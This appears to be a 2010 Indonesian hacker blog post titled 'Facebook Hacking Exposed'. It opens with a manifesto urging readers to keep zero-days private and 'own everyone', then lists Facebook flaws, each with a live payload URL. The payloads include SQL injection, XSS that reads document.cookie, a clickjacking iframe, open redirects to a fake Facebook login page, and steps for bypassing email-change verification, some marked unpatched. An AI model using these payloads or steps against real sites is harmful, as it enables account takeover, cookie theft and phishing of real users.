_____ __ _____ ___ _____ ___ _____ _____ _____ _____ _____ _____ _____ _____ ____ _____ _ _ _ _____ | __|| | | | ||_ | | | || | | | __|| __|| __ || | || __|| __ | | || __| | \ | || | | || | | | __|| |__ | | | _| |_ | | | ||_ | |__ || __|| -|| | || __|| -| |- -||__ | | | || | || | | || | | | |_____||_____| \___/ |_____||_|___| |_| |_____||_____||__|__| \___/ |_____||__|__| |_____||_____| |____/ |_____||_____||_|___| I DONT WANT TO BE FAME , I DONT WANT TO BE ANY EZINE , I JUST WANT TO SHARE KNOWLEDGE
, ----. ~ Fuck full-disclosure - - ` ~ Fuck the security industry ,__.,' \ ~ Keep 0days private .' *` ~ Hack everyone you can and then hack some more / | | / **\ ~ Blend in. . / ****. ~ Get trusted. | mm | ****| ~ Trust no one. \ | ****| ~ Own everyone. ` ._______ \ ****/ ~ Disclose nothing. \ /`---' ~ Destroy everything. \___( ~ Take back the scene /~~~~\ ~ Never sell out, never surrender. / \ ~ Get in as anonymous, Leave with no trace. / | \ ~ This your Fucking IP | | \ ~ This your Fucking ISP , ~~ . |, ~~ . | |\ ~ FUCK OFF I've got enough friends !!!! ( |||| ) ( |||| )(,,,)` ( |||||| )-( |||||| ) | ^ ( |||||| ) ( |||||| ) |'/ ( |||||| )-( |||||| )___,'- ( |||| ) ( |||| ) ` ~~ ' ` ~~ '

[ Blog ]

[ History ]


Facebook Hacking Exposed

============================================
Bugs Track Archive
============================================
Facebook SQLi : PATCH

Facebook App XSS : PATCH

Facebook Account Bruteforce : PATCH

Facebook Bypass Change Email Verification : UNPATCH

Facebook App SQLi : UNPATCH

Facebook CSRF : PATCH

Facebook App ClickJacking : PATCH

Facebook App Remote Redirection : UNPATCH

Facebook Reset Password suffers major XSS flaw : PATCH

============================================

Facebook SQLi
-------------
Threat Level : Dangerous
Status : Patch
live demo :
########################################################################
https://developers.facebook.com/news.php?story=358&amp%3Bblog=1'+and+1%3D0+--+
########################################################################

Facebook App XSS
-----------------
Threat Level : Medium
Status : Patch
Live demo :
########################################################################
https://apps.facebook.com/blognetworks/searchpage.php?tag=%22%3E%3Cscript%3Ealert%28%22xSselv1n4%22%29%3C/script%3E
########################################################################

Facebook Account Bruteforce
--------------------------
Theat Level : Medium
Status : Patch
Live Demo :
########################################################################
Try Using Facebook Account BruteForce . click here for get the source
########################################################################

Facebook Bypass Change Email Verification
----------------------------------------
Threat Level : Medium
Status : Unpatch
Live Demo :
########################################################################
1st : Open Facebook site , and Click Forgot password
null

2nd : Now, Click Login Problem Help
null

3th : You May Retype The Url , And Make Sure With help/?page=746
null

4th : Now Fill The Login Issue .
null

5th: Open Your New Mail ( Not Your Old mail ) . and please Respon .
########################################################################

Facebook App SQLI
----------------------------------------
Threat Level : Medium
Status : Dangerous
Live Demo :
########################################################################
http://apps.facebook.com/tvshowchat/show.php?id=4333/**/and/**/1=2/**/union/**/select/**/version%28%29+--+
########################################################################


Facebook CSRF
----------------------------------------
Threat Level : Medium
Status : patch
Live Demo : http://blog.quaji.com/2009/08/facebook-csrf-attack-full-disclosure.html
########################################################################


Facebook App ClickJacking
----------------------------------------
Threat Level : Dangerous
Status : patch
Live Demo :
########################################################################
http://apps.facebook.com/onthefarm/index.php?type=%22%2F%253E%253Cfb%253Aiframe%2Bsrc%253D%2522%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Ffbpr1-proxy.farmville.zynga.com%2Fcurrent%2Findex.php%3Ftype%3D%2522%252F%253E%253Ciframe%2Bsrc%253D%2522http%253A%252F%252FEVILURI%252F%2522%253E
########################################################################

Facebook App Remote Redirection
----------------------------------------
Threat Level : Medium
Status : Unpatch
Live Demo :
########################################################################
http://apps.facebook.com/quelendroitltwgzmv/?next=http://www.elv1n4.serverisdown.org
http://apps.facebook.com/quelendroitltwgzmv/?next=http://fakeloginfacebook.com/

If You Know Path Interval , You Can Check 1 by 1 Sensitif Coloum :) for example :
http://apps.facebook.com/quelendroitltwgzmv/?next=sys/config.php
########################################################################

Facebook Reset Password suffers major XSS flaw
----------------------------------------
Threat Level : Medium
Status : patch
Live Demo :
########################################################################
http://www.facebook.com/reset.php?locale=en_GB%22%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
########################################################################



tHx
./me

Labels: ,


On 3/6/10 at 10:31 PM


tahun baru . tampilan baru ^_^

horeee tahun baru 2010 , selamat tahun baru buat kalian semua pembaca blog vina .
semoga tahun ini menjadi tahun yang lebih baik
dari pada tahun kemarin (amien)
On 1/4/10 at 3:11 AM



My Profile:


Biography:

short story:

[ Friends Link ]

[ chat with me ]


[ archives ]

[ Notices ]

By title

Facebook Hacking Exposed
tahun baru . tampilan baru ^_^

By month

2002.03 2002.12 2005.12 2008.11 2009.02 2009.03 2009.04 2009.05 2009.06 2009.07 2009.08 2009.09 2009.10 2009.11 2009.12 2010.01 2010.03



 


elv1n4 Themes v2.0.0 © 2009 by elv1n4

www[dot]elv1n4.anti-sec[dot]org